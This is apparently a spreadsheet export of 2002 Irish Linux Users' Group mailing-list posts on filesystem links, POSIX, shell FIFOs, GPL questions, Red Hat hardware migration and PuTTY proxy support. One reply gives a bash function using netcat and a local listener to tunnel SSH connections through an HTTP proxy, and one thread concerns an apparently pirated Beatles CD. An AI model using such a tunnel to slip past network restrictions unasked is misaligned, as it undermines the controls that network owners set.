 &gt; to make them consistent with hard links.So, they're the same as hard links, with the disadvantage that they
break on deletion or moving, and they may take up slightly more disk
space. Hmm. &gt; &gt; A better way of doing it would be a) have global unique filesystem
 &gt; &gt; identifiers for every FS created (such that the chance of two of them
 &gt; &gt; clashing is miniscule; 64 bits creatively used would do it, I'd say),
 &gt; &gt; and b) implement the target info for the soft link as a {FSID, inode}
 &gt; &gt; pair; the OS can work out if the thing linked to is now on a different
 &gt; &gt; mount point, or has been moved. (HFS fans, is that what's done? Or are
 &gt; &gt; aliases implemented differently?)
 &gt; 
 &gt; let's call these super-soft-links.  ln -ss
 &gt; 
 &gt;     % ln -ss foo bar
 &gt;     % ls -i foo
 &gt;     111 foo
 &gt;     % mv floyd foo
 &gt;     % ls -i foo
 &gt;     222 foo
 &gt; 
 &gt; and now bar no longer points to foo.True. But "cat floyd &gt; foo; rm floyd" preserves it. Much of a muchness
... &gt; the fs would need to maintain a table of links going the other direction.
 &gt; so when the move command unlinks foo in the first example, it could
 &gt; check the table and mark that bar is now disconnected.  the same would
 &gt; be true for the second example - and even more important since bar points
 &gt; to floyd if no table is consulted.
 &gt; 
 &gt; and this all fails to handle nfs mounted file systems or filesystems
 &gt; that have dynamic inodes (the fat fs's and reiser lacks inodes i think).Hokay. -- 
I'm not a pheasant plucker / I'm a pheasant plucker's son.
I'm just a'plucking pheasants / 'Til the pheasant plucker comes.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm sure that The Beatles are weel happy with Microserfs for robbing them
blind of their "intellectual Property"I'm gonna mail complaints@microsoft.com and get them to put an end to these
windows cd's ;--)Don't suppose you have a reference for it? I've made a lot of friends in the
MS complaints department, its amazing what you can say to them and get away
with it --::)))CWAnd no sorry I don't know the solution, they must be pretty bad quality
though if you can fit 25 albums on one CD. I would say they are Mpeg encoded
or some buzz like that. ---------------------
I've got some really interesting wav files here.A friend had a Windows CD with, wait for it . . .Every Beatles Record ever released in the U.K.! Including the Christmas and 
BBC special albums! All on one, ordinary CD! Yes a 650M CD!Of course this CD also had a special Windows app for playing this
collection!I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noise!xanim can, and does play them correctly though. Unfortunately xanim does nothave any position control so you just have to listen to the album from startto finish.file has this to say about them:johngay@debian:/home/jgay$ file beatles/SGT.WAV
beatles/SGT.WAV: RIFF (little-endian) data, WAVE audio, Microsoft ADPCM, 
stereo 22050 Hz
johngay@debian:/home/jgay$ ls -l beatles/SGT.WAV
-r-xr-xr-x    1 johngay  johngay  53334900 Sep 27  2001 beatles/SGT.WAVAnd this is SGT Pepper's lonely Hearts Club Band album. 51M is quite good, 
considering it also has the inner track. But they certainly are NOT in
stereo.What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either.Any help will be greatly appreciated!Cheers,	John Gay
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Kevin wrote:
&gt; am i the only one who thinks this is like "friday night 80's" for ilug?
&gt; and here's an answer from 1989.  for those perceptive folks in the
&gt; audience you'll note that it makes no reference to a windows icons.&gt; so yeah, unrm would be nice, but obviously it's not a simple problem.
&gt; millions of lines of code, hundreds of projects, no unrm.  heck, the
&gt; hurd will probably release 1.0 before unrm shows up.So what this tells us is:
1) There are very few new ideas.
2) Problems exists until someone gets annoyed enough to actually fix them
rather than find bizarre ways to solve the problem.
3) I have too much creative time on my hands with not enough productive
time.&gt;&gt;From which we can infer that no work on unrm will be happening on my
computer for a long time.:)-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
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Mon, 22 Jul 2002 09:09:41 +0100
  | From: "John P. Looney" 
  |[ ... ]
  | That's something that POSIX would do - make every platform as
  | equally broken, rather than standing up and saying "how about
  | we try &amp; make everyone better". eh?  POSIX doesn't "do" anything.  POSIX is a de jour
 specification for a voluntary minimal implementation to
 encourage software transportability.  no-one, absolutely
 no-one, has or ever had to implement POSIX or be restricted
 to POSIX.  commercial considerations et.al. may encourage
 some "POSIX-compatibility", but that's a freely-made choice. IMHO, the process's weakness is a general rule --- which
 has been ignored on occasion --- to only consider "formal"
 submissions of "proven" technologies.  that translates into
 specifying more-or-less common parts of the existing *ix
 implementations which actively contribute to the process.
 most of the committees are loath to blue-sky, solicit
 proposals/research, or pick an uncommon or unsponsored
 implementation, even when manifestly superior.  (IMHO,
 this is why POSIX is *ix and not, e.g., Plan9 or Inferno.) OTOH, considering the motivating force behind the process,
 it can be argued the above "weakness" is a strength ....  | (why? Because in the real world, you can't. Somethings just suck) yep.  which is not to say POSIX "sucks" per se.  but the old
 pre-POSIX *ix world arguably did, at least in terms of ease
 of software porting.  one of *ix's claims to fame is it is
 perhaps the first system where one could seriously consider
 porting, more or less intact and with relative ease, software
 from one architecture+platform+vendor to a radically utterly
 different triple. however, as people discovered, there's a lot of difference
 between "consider porting" and "actually porting" --- and
 some problems were silly.  some were self-inflicted (e.g.,
 assuming byte-orientation or a particular endianness); but
 others were Frustrating "system" incompatibilities --- the
 motivating force that lead to /usr/group, XPG (X/Open), POSIX,
 Spec1170, Unix98, Common Unix, &amp;tc.     Â«The nice thing about standards is there's so many to
      choose from.Â»   -- commonly attributed to bwk.cheers!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</si>
  <si>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  | Date: Sat, 20 Jul 2002 10:47:36 +0100
  | From: Stephen Shirley 
  |[ ... ]
  | It's very easy to get one program to act on the output of a second
  | program: cmd1 | cmd2. But, what if you want cmd1 to act on the output
  | of cmd2 as well? Hmm. Eventually, I came up with this solution:
  | 
  |    mkfifo io
  |    cmd1  io
  | 
  | and bingo, all was well with the world. Now, I have (and had) a sneaking
  | suspcion that it might be possible to do this without using a fifo, and
  | can be done using something like:
  | 
 1|    exec 3&gt;&amp;1
 2|    cmd1 &lt;&amp;3 | cmd2 &gt;&amp;3
 3|    exec 3&gt;&amp;-
  | 
  | but that doesn't work in that form, and i couldn't work out an
  | incantation that would. Anyone got any suggestions?  [ ... ] the above, or something close to it, would work if, when the
 1st line is executed, file descriptor (fdesc) 1 is open for both
 read and write (R/W) to a suitable entity (e.g., a pipe/FIFO; I
 imagine a socket or something of that ilk could be made to work
 but have no idea why you'd want to go to the trouble.... ). but in any case, all that is unlikely to be the case:
  Â· most probably, fdesc 1 is yer tty (e.g. screen + keyboard);
 and
  Â· quite possibly is open only for write (being stdout). you need it open for R/W because all dup2(2) --- which is all
 `n&gt;&amp;m' means -- does is replicate the fdesc handle.  it does not
 change the access mode; e.g., if the original fdesc (m) was only
 open for writing (W), that's all the new fdesc (n) is open for.
 yet in the 2nd line, it's needed for both R (cmd1) and W (cmd2). whilst it's impossible to say for certain from this excerpt, it
 seems a reasonable guess that fdesc 1 when the 1st line executes
 is the stdout of the script itself, which is most probably yer
 tty.  that means, if it does happen to be open for R/W (which is
 the case on some systems), `cmd2' would be writing to the screen
 whilst `cmd1' is reading from the keyboard --- i.e., the poor
 confused human luser is "clearly" expected to manually echo back
 to the computer what it prints. good luck!  ;-) upshot:  the FIFO is needed.  and this isn't a shell scripting
          problem per se. the FIFO solution is fine.  I've used variations (plural) on
 this approach to extend the Korn (ksh(1)) shell language, by
 providing a co-processing interpreter --- `ksh' sends certain
 predefined commands to the co-process, handling control over
 to the co-process until it indicates processing is complete
 and `ksh' can resume normal processing.  with some thought and
 care to insure signals do something rational, works great for
 adding a scripting language (which is the purpose) cheaply to
 script-less programs (useful when you can't modify the, IMHO,
 buggy program to use, e.g., TCL).cheers!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</si>
  <si>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
Hi Kevin,In the past when administering large domains, I've used the DNSTool -
http://www.gormand.com.au/tools/dnstool/guide.htmlOne custom change I made to this tool was to modify it so that it used a
combination of OpenSSH and sudo for remote commands, file transfers, etc.This may, or may not be what you're after - I'm presuming that you're
considering writing a tool to do the maintenance of the domains?Regards,
  Andrew
   This email is my own opinion, no-one elses, yada yada...
--
Andrew Barnes                                                                                                                                    
                    kevin lyda                                                                                                      
                    @linux.ie&gt;                            cc:                                                                       
                    Sent by: ilug-admin@linux.ie          Subject:     [ILUG] bind + lex + yacc...                                  
                    22/07/2002 15:39                                                                                                
                                                                                                                                    i recently received this email from a friend of mine in the states:    i'm trying to figure out how to maintain about 200 domains, with a
    hundred or so computers per domain.  some internal, some external.
    i recently learned lex and yacc and i'm thinking that's the way to go.
    i don't really know perl and i know it's useful but i think i can
    write c faster then perl.    is this a good idea?    ps  we're really busy.obviously as a stupid developer with no real admin experience to speak
of, i'm not qualified to answer this question.  does anyone with real
admin experience have any suggestions here?  the problem sounds really
hard, and i doubt anyone has had to deal with this level of complexity
so there probably aren't any existing tools written.anyone else have any opinions or experience i could pass on?kevin--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listmaster@linux.ieandrew.p.barnes
AIB
Internet Technical Support
Bankcentre
01-6411600This document is strictly confidential and is intended for use by the
addressee unless otherwise indicated.Allied Irish BanksThis Disclaimer has been generated by CMDis-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I've got some really interesting wav files here.A friend had a Windows CD with, wait for it . . .Every Beatles Record ever released in the U.K.! Including the Christmas and 
BBC special albums! All on one, ordinary CD! Yes a 650M CD!Of course this CD also had a special Windows app for playing this collection!I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noise!xanim can, and does play them correctly though. Unfortunately xanim does not 
have any position control so you just have to listen to the album from start 
to finish.file has this to say about them:johngay@debian:/home/jgay$ file beatles/SGT.WAV
beatles/SGT.WAV: RIFF (little-endian) data, WAVE audio, Microsoft ADPCM, 
stereo 22050 Hz
johngay@debian:/home/jgay$ ls -l beatles/SGT.WAV
-r-xr-xr-x    1 johngay  johngay  53334900 Sep 27  2001 beatles/SGT.WAVAnd this is SGT Pepper's lonely Hearts Club Band album. 51M is quite good, 
considering it also has the inner track. But they certainly are NOT in stereo.What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either.Any help will be greatly appreciated!Cheers,	John Gay
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 03:35:36PM +0100 or so it is rumoured hereabouts, 
Niall O Broin thought:
&gt; illustrates this admirably. The poster is in the form of a PDF file and to
&gt; be honest, is best appreciated if you have access to a HP DesignJet orSpeaking of HP Designjets, has anyone managed to utilise the full width of
the paper on a HP Designjet 750c under RH7.x?  The HP can take a 24" wide
roll while the driver (dnj650c) lists a paper size of 16x24.
Unfortunately, this will print only in protrait mode so I get a 24"x24"
page with an unused 8" strip down one side!  I'd like to be able to print
24x or whatever (even 24x30!) but I don't seem able to do so.Any thoughts?Conor
-- 
Conor Daly Domestic Sysadmin :-)
---------------------
Faenor.cod.ie
  6:49pm  up 57 days,  4:07,  0 users,  load average: 0.03, 0.03, 0.00
Hobbiton.cod.ie
  6:38pm  up  1:15,  1 user,  load average: 0.03, 0.06, 0.04-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Fri, 19 Jul 2002 22:00:02 +0100
  | From: "Matthew French" 
  |[ ... ]
  | Now here is a thought: a Unix version of the "Deleted Items" folder.
  | 
  | In the root of a hard drive, create a directory ".unwanted".
  | Then periodically create hard links to every file on the hard
  | drive that does not have hard links.
  | 
  | That way, when someone accidentally does "rm *" or whatever,
  | you still have a link under ".unwanted"  [ ...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</si>
  <si>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Mornin' all,
	Last night, i was involved in an epic struggle to write a shell
script to do a certain task. The battle raged for hours, but, i'm glad
to inform you, i emerged victorious. The problem was as follows:
	It's very easy to get one program to act on the output of a second
program: cmd1 |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exec 3&gt;&amp;1
	cmd1 &lt;&amp;3 | cmd2 &gt;&amp;3
	exec 3&gt;&amp;-but that doesn't work in that form, and i couldn't work out an
incantation that would. Anyone got any suggestions? Anyway, victory is
mine, and i is happy person once again. In case you were wondering, the
aim of all of this was to write a shell script that could check for new
mail on an imap server.Steve
-- 
"Oh look, it's the Pigeon of Love."-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 08:48:40PM +0100, Ronan Cunniffe wrote:
&gt; Quoting Ronan Waide :
&gt; 
&gt; &gt; Sure, but soft links would do the same. To be honest, I'm trying to
&gt; &gt; think of a useful use of hard links right now, and I'm a little
&gt; &gt; stumped. There's gotta be some benefit that I'm missing that's
&gt; &gt; immediately obvious to everyone.
&gt; 
&gt; Using Niall's example - single set of files but &gt;1 namespace, and suppose that
&gt; you want to delete some items from the set according to rules applied to the
&gt; namespaces.  With soft links you need an *extra* namespace the others refer to,
&gt; and after filtering the namespaces, you have to do a manual reference count to
&gt; decide what goes and what stays.  With hard links, you just unlink and deletion
&gt; is automatic.Couldn't have put it better myself, but that's not going to stop me trying :-) 
The above situation occurs precisely because of the major functional difference
between symbolic links (AKA soft links, or symlinks to their friends) and hard
links. Two hard links to the same file are exactly equivalent - one is no more
the files "real" directory entry than is the other. OTOH a symlink is a special
thing which is a link to a real file, and when the file linked to is erased, you
end up with a broken symbolic link - you can't have a broken hard link (except
of course in the case of a banjaxed filesystem).
Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 10:47:36AM +0100, Stephen Shirley wrote:
...
&gt; 	It's very easy to get one program to act on the output of a second
&gt; program: cmd1 | cmd2. But, what if you want cmd1 to act on the output of
&gt; cmd2 as well? Hmm. Eventually, I came up with this solution:
&gt; 
&gt; 	mkfifo io
&gt; 	cmd1  io
...
&gt; mine, and i is happy person once again. In case you were wondering, the
&gt; aim of all of this was to write a shell script that could check for new
&gt; mail on an imap server.Doesn't answer your question, but perhaps a combination of expect and
(netcat or telnet) might have made for an easier solution?Later
Kenn
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Quoting Ronan Waide :
 &gt; Sure, but soft links would do the same. To be honest, I'm trying to
 &gt; think of a useful use of hard links right now, and I'm a little
 &gt; stumped. There's gotta be some benefit that I'm missing that's
 &gt; immediately obvious to everyone.No there doesn't :-) . The Bell labs Unix people implemented hard
links, whereas Bill Joy and co. at Berkeley implemented soft links,
five years later, mainly to get around not being able to do
cross-device hard linking, as I understand it. Soft links are fairly
classic Berkeley hackery (cf. gethostbyname, h_errno, and the
resultant problems implementing mt-safe interfaces); they do what they
were intended for, but break fairly easily, in this case when the
target file was deleted. For a better design for similar ideas, see
the MacOS.-- 
I'm not a pheasant plucker / I'm a pheasant plucker's son.
I'm just a'plucking pheasants / 'Til the pheasant plucker comes.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 09:53:16PM +0100, awhalley@eircom.net wrote:&gt; The setup is as follows:
&gt; I develop a piece of code using PHP 3.0.9 which is, to
&gt; my knowledge, GPL. PHP is released under the GPL, yes.&gt; The piece of code runs on my server and is an integral part of a system
&gt; that I have developed for a client. I did not recieve payment for this
&gt; particular piece of code but I did recieve payment for the system. My client
&gt; now wants to use a different service provider but keep my code.&gt; Do I have a right to claim intellectual property rights for my little
&gt; piece of code that he did not pay me for or do I have to give the client the
&gt; code under the GPL.Exactly what rights you would have to the code depends on the contractual
arrangement you have with your client, and I'm betting that that's not at
all cut and dried.However, I have been in this situation where a client was using code I
developed and then decided that he should own the code. Push never came to
shove (at least, not yet :-) ) but my understanding of the situation vis a
vis software is that in the absence of any contract granting ownership of
the code to another party, it remains with the person who wrote it. I didn't
take legal advice on this but my customer did :-) and his lawyer told him
that I was right and would most likely win in court.So much for the ownership of the code vis a vis you and your client - now for
the GPL issues. Code compiled by a compiler which is GPL software (e.g. gcc) is not itself
covered by the GPL unless its author chooses to make it so. This is perhaps
not made clear enough in the GPL text and is a particular piece of FUD which
Microsoft loves to toss about. Similarly, the copy of PHP which is part of
your customer's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it.If OTOH you had written some code which modified PHP as such, and then
distributed (whether for a fee or not) that modified PHP, then the modified
code must be licensed under the GPL. But this applies to a modification to
PHP itself and NOT to your scripts which run under PHP.The relevant clause is 2(b) which says (though Lord knows why I'm quoting when
locate COPYING will turn up a shedload of copies of the GPL on just about
any Linux box - 540 on this box)b)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part.&gt; I know this is not strictly a 'Linux' issue but any help would be appreciatedMicrosoft has very much made this a Linux issue - it has attempted to imply
that any company using GPL software must make everything it owns public and
it must be true - that nice man from Microsoft wouldn't lie, would he ?Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 12:18:57PM +0100, Kenn Humborg wrote:
&gt; &gt; mine, and i is happy person once again. In case you were wondering, the
&gt; &gt; aim of all of this was to write a shell script that could check for new
&gt; &gt; mail on an imap server.
&gt; 
&gt; Doesn't answer your question, but perhaps a combination of expect and
&gt; (netcat or telnet) might have made for an easier solution?Indeed, and that was the fall-back plan if i couldn't figure this out,
but i knew it had to be possible, and was determined to find a way.Steve
-- 
"Oh look, it's the Pigeon of Love."-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Never having to support a large network myself, I know very little about
this..
but what do lex &amp; yacc have to do with anything ?These are language parsers, used to build complilers / interptreters  and
the like???!!!BIND, ok large networks might need DNS....Have I missed something completely?J&gt; -----Original Message-----
&gt; From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of kevin
&gt; lyda
&gt; Sent: Monday, July 22, 2002 3:39 PM
&gt; To: irish linux users group
&gt; Subject: [ILUG] bind + lex + yacc...
&gt;
&gt;
&gt; i recently received this email from a friend of mine in the states:
&gt;
&gt;     i'm trying to figure out how to maintain about 200 domains, with a
&gt;     hundred or so computers per domain.  some internal, some external.
&gt;     i recently learned lex and yacc and i'm thinking that's the way to go.
&gt;     i don't really know perl and i know it's useful but i think i can
&gt;     write c faster then perl.
&gt;
&gt;     is this a good idea?
&gt;
&gt;     ps  we're really busy.
&gt;
&gt; obviously as a stupid developer with no real admin experience to speak
&gt; of, i'm not qualified to answer this question.  does anyone with real
&gt; admin experience have any suggestions here?  the problem sounds really
&gt; hard, and i doubt anyone has had to deal with this level of complexity
&gt; so there probably aren't any existing tools written.
&gt;
&gt; anyone else have any opinions or experience i could pass on?
&gt;
&gt; kevin
&gt;
&gt; --
&gt; kevin@suberic.net     that a believer is happier than a skeptic
&gt; is no more to
&gt; fork()'ed on 37058400    the point than the fact that a drunken
&gt; man is happier
&gt; meatspace place: home       than a sober one. the happiness of
&gt; credulity is a
&gt; http://ie.suberic.net/~kevin   cheap &amp; dangerous quality -- g.b. shaw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
</t>
  </si>
  <si>
    <t xml:space="preserve">Surely it would be faster to save you conf files, install it on the box
again, copy back you confs and voila.
All you car about are the confs as the boite has no DATA right?Thats what I would do, but you sysadmins have to make life as difficult &amp;
complicated as possible ;--)Have you thought about mirroring the system drives? Might save you serious
hassle down the line. Only kidding but thats what I would do.CW----------------
OK, Here's how to do it [1] ...While the disk is still installed in the i686 machine (if that's broken,
beg, borrow or steal...), remove the i686 versions of glibc and kernel and
install the i386 versions.  This will break one or two other packages since
they have entries in /etc/ld.so.conf which belongs to glibc.  these packages
will need to be reinstalled.  So:1. rpm -e --nodeps glibc	Your /etc/ld.so.conf has been saved as /etc/ld.so.conf.rpmsave2. rpm -ivh glibc--i386.rpm
3. rpm -e --nodeps kernel
4. rpm -ivh kernel--i386.rpmThis installs the i386 versions of kernel and glibc.  You'll be able to boot
in a non 686 machine now.  However, X is now broken as is kerberos.  At
least those are the two I noticed.  Your /etc/ld.so.conf.rpmsave will
contain clues as to what else might be broken.  To fix X and kerberos you
need to reinstall their libs (copying /etc/ld.so.conf.rpmsave back to
/etc/ld.so.conf doesn't seem to work):1. rpm -ivh --replacepkgs XFree86-libs--i386.rpm
2. rpm -ivh --replacepkgs krb5-libs--i386.rpmfixes them.  Other libs listed in _my_ /etc/ld.so.conf are qt, mysql and
sane.  If they start behaving in odd fashions, it may be related.
Reinstalling the libs for these packages may fix that.Thanks guys...&gt; [snip]
&gt; 
&gt; &gt; &gt; [I] wouldn't bog it down with X either.
&gt; &gt;
&gt; &gt; That's a thought but it may be useful for the server to be available as
a
&gt; &gt; user machine also (maybe staff only, maybew admin only).  In any
&gt; &gt; case, the
&gt; &gt; local admin (who doesn't exist as yet) will probably be using GUI
&gt; &gt; tools rather
&gt; &gt; than cli ones...
&gt; 
&gt; Well, yes, it could be running lovely GUI tools as well. Though, are you
&gt; sure you want to have them available? Most of the ones I've seen are
better
&gt; of to be put down. I'd rather then be using Webmin for day to day
&gt; maintenance, and give the local admins just a restricted set of things
they
&gt; can do with it. Like adding and removing users and the likes. Then the
&gt; "dangerous" parts of the admining side can be "hidden" away from their
&gt; prying hands. True, they can always break into it, since they have
physical
&gt; access to it as well. On the other hand it would be better if they
contacted
&gt; yourself for the remaining admin tasks, since I believe this was supposed
to
&gt; be remotely administered by yourself, IIRC??Since this thing will be on a sub 56k dialup, any remote admin will be
strictly of the emergency variety.  I plan to have the server mail me its
logs and stuff regurlarly so I can keep an eye on it but most/all of the
admin will be done locally.Conor[1] "it" being migrate a Hard Disk from an Intel P3/4/celeron box to an AMD
K6-x box.  Essentially, the P3/4/celeron processor is an i686 class while
the AMD K6 processor is an i586 class (not sure about the AMD athlon or
duron chips).  A RHL installed on the i686 class machine will not boot on an
i586 calss box since both kernel and glibc are optimised for i686.  The
solution is to replace the i686 kernel and glibc with i386 versions.
-- 
Conor Daly 
Met Eireann, Glasnevin Hill, Dublin 9, Ireland
Ph +353 1 8064276 Fax +353 1 8064247
------------------------------------
bofh.irmet.ie running RedHat Linux 10:27am  up 8 days, 23:57,  5 users,
load average: 0.19, 0.30, 0.49
**********************************************************************
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the system manager.This footnote also confirms that this email message has been swept 
for the presence of computer viruses.
**********************************************************************
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">A while ago I asked what other packages I should optomize for Pentium. One 
person answered GlibC. This got me thinking about GCC itself, so I asked on 
another list and got a few answers, most were "don't even think about it" but 
a few suggested GCC and one pointed me to Linux From Scratch.After having a good search around the lfs site, I've decided I'm going to 
give it a whirl. I've got a spare box and loads of free time, so why not ;-)The lfs site, however warns NOT to use optimizations when compiling GCC or 
GlibC? A quick google found PGCC, a Pentium optimizing patch for GCC, but the 
site does not seem to have been updated in quite some time?So, my general plan, and I'm taking my time with this:Partition the hard drive for the lfs set-up with 4 partitions, /, /usr, /var 
and /home.
Install a base Debian system into the /home  partition so I can build the 
rest of the system into the other partitions.
Using Debian, build the initial packages into the / and /usr partitions. I'll 
try to optimize GCC and GlibC in this first stage.
chroot to the / partition and re-build the base packages for shared libs.
strip de-bugging from the binaries and change the boot so the system boot 
from / rather than /home, then move /home to it's proper partition.All going well, I should now have a full base Linux system running that is 
fully optimized for my PentiumMMX including GCC and GlibC.Now I can build zlib and then X, again optimizing. And I can follow this with 
the various graphics libs, qt lib and finally KDE.If all goes well, I will probably repeate this for my Dual system, once I can 
find a match for the slot1 550Mhz PIII Iv'e got.I might even be tempted to write this up for the site.Cheers,	John Gay-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 26, 2002 at 11:24:30PM +0100, John Gay wrote:
&gt; A while ago I asked what other packages I should optomize for Pentium. One 
&gt; person answered GlibC. This got me thinking about GCC itself, so I asked on 
&gt; another list and got a few answers, most were "don't even think about it" but 
&gt; a few suggested GCC and one pointed me to Linux From Scratch.why?or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</si>
  <si>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Actually, they do; though they aren't case sensitive. It seems to have some 
trouble wtih PAP/CHAP authentication  as well; you might have to do it by 
script?On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â‚¬10 per second for tech support :-).
&gt;
&gt; 01-2434321
&gt; username: oceanfree
&gt; password: oceanfree
&gt;
&gt; don't think the username and password matter much though.
&gt;
&gt; L.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Mornin' all,
	I'm running one of the development snapshots of putty, and i just
noticed a very handy new feature: builtin proxy support. This means that
people like me can connect to external hosts using ssh via a http proxy.
Nitfy.Steve
-- 
"Oh look, it's the Pigeon of Love."-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">gcc, glibc and binutils, which the lfs site says not to optimise,
already determines what system you're compiling on, and optimises itself
to that. That's my understanding of how it works anyway.JohnSubject: Re: [ILUG] Optimizing for Pentium Pt.2
On Fri, Jul 26, 2002 at 11:24:30PM +0100, John Gay wrote:
&gt; A while ago I asked what other packages I should optomize for Pentium.&gt; One
&gt; person answered GlibC. This got me thinking about GCC itself, so I
asked on
&gt; another list and got a few answers, most were "don't even think about
it" but
&gt; a few suggested GCC and one pointed me to Linux From Scratch.why?or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chips.kevin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">hi all,
I installed gentoo 1.2 with gnome2 but when right click on the desktop 
and  under disks i get not options, What file(s) do i have to edit to 
get this option enabled.
Any ideas ?.
regards,
Nils
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 27, 2002 at 03:06:15PM +0100, Stephen Shirley wrote:
&gt; Mornin' all,
&gt; 	I'm running one of the development snapshots of putty, and i just
&gt; noticed a very handy new feature: builtin proxy support. This means that
&gt; people like me can connect to external hosts using ssh via a http proxy.sort of. Squid, and most other good http proxies won't let you connect
to any other destination port other than 443 (by default).  So the sshd 
has to be listening on port 443. PuTTy's proxy support is a bit flaky 
right now, the raw connects are a bit flaky aswell, I can't get them 
to work with certain revisions of IOS becuase they use different prompts
and success strings, gah! I havnt played with the SOCKS proxy support
much yet, but it's there.If you're trying to SSH through a http proxy, use netcat :)
PuTTy's proxy stuff will take another few weeks to get stable, and
currently it won't send keepalives, so if you go afk expect your 
session to get killed by the proxy.  Netcat send keepalives
which prevent this :)# 
# call as http_proxy_tunnel host port
#
function http_proxy_tunnel()
{
	mkfifo in.fifo	( echo CONNECT $1:$2 HTTP/1.1 
          echo HOST: $1:$2
          echo HTTP/1.1
	  echo 
          cat in.fifo ) | nc myproxy 3128 | (read ; read ; nc -lp  &gt; in.fifo )
}
course that assumes you have bash, I use cygwin, but the above should be
doable natively, then again if you have cygwin, use OpenSSH and it's
excellently configurable proxycmd :)-- 
colmmacc@redbrick.dcu.ie        PubKey: colmmacc+pgp@redbrick.dcu.ie  
Web:                                 http://devnull.redbrick.dcu.ie/ -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 26, 2002 at 03:56:22PM +0100 or so it is rumoured hereabouts, 
Wynne, Conor thought:
&gt; Surely it would be faster to save you conf files, install it on the box
&gt; again, copy back you confs and voila.
&gt; All you car about are the confs as the boite has no DATA right?
Yeah, but then I'd have to remember _exactly_ which confs I'd modified and
they're not all in /etc either...&gt; Thats what I would do, but you sysadmins have to make life as difficult &amp;
&gt; complicated as possible ;--)Yup...  In this case, I had two issues.  1. I mirrored the disk to give to
someone else to work on but the box he has available has only a P1 or P2
processor.  2. My celeron box has been crashing the backup software so I
wanted to try out the backup in a different box to make sure it's hardware
related.  Again, it's also an interesting exercise...
&gt; Have you thought about mirroring the system drives? Might save you serious
&gt; hassle down the line. Oh, I'm doing that too.  This is going to Africa so I'm aiming for as
robust as possible with belt, braces and probably an all-in-one jumpsuit!
I'll be mirroring the disk but that is worth only so much (eg. lightning
strike taking out the disk(s) or system compromise)  I'm also going for a
backup to CDR with an automated restore http://www.mondorescue.org .  The
admin out there wouldn't be able to build the system again if the mobo got
fried and the replacement was the wrong arch but an i386 compatible
install will mean just dropping in the HD and booting (ish)...Conor
-- 
Conor Daly Domestic Sysadmin :-)
---------------------
Faenor.cod.ie
  2:32pm  up 64 days, 23:49,  0 users,  load average: 0.00, 0.00, 0.00
Hobbiton.cod.ie
  2:19pm  up 7 days, 20:56,  1 user,  load average: 0.05, 0.02, 0.00-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
